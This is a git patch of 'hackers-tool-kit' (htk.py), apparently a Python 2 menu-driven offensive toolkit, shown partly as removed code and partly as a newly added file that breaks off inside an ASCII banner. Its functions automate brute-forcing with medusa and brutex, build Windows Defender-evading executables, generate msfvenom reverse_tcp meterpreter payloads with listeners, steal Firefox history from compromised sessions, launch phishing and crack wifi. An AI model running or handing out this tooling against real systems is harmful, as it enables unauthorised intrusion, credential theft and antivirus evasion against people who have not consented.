DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - - -#NANO START# -#----------# -def nano(): - print "opening nano in \033[93m/root/\033[0m folder" - os.system("sleep 2") - os.system("cd /root/ && nano") -#--------# -#NANO END# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - if x == "nano": - nano() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From d502d4a4fe050f3c37ef8ba0ef13187a5d5e4f06 Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 31 May 2019 01:25:23 +0100 Subject: [PATCH 168/214] Add files via upload --- htk.py | 3163 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3163 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..60d65f3 --- /dev/null +++ b/htk.py @@ -0,0 +1,3163 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ 